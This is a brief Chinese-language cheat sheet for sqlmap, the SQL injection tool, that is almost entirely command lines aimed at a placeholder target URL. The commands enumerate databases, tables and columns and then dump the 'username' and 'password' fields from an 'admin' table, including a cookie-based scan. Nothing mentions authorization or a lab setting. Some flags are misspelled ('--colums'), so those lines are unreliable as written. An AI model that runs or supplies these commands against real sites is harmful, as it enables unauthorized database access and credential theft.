sqlmap是python语言编写的一款强大的sql注入工具,并且支持多种数据库注入以及各大提交注入等。
安装sqlmap时,本机要有python的编译环境。
sqlmap使用(access):
sqlmap.py -u 目标地址
sqlmap.py -u 目标地址 --tables //猜解表名 afmin
sqlmap.py -u 目标地址 --colums -T admin
sqlmap.py -u 目标地址 --dump -C "username,password" -T admin
sqlmap.py -u 目标地址 --dbs //爆库
sqlmap.py -u 目标地址 -D database --tables
sqlmap.py -u 目标地址 -D database -T admin --colums
sqlmap.py -u 目标地址 -D database -T admin -C id,username,password --dump
sqlmap.py -u 目标地址 --cookie "id=X" --table --level 2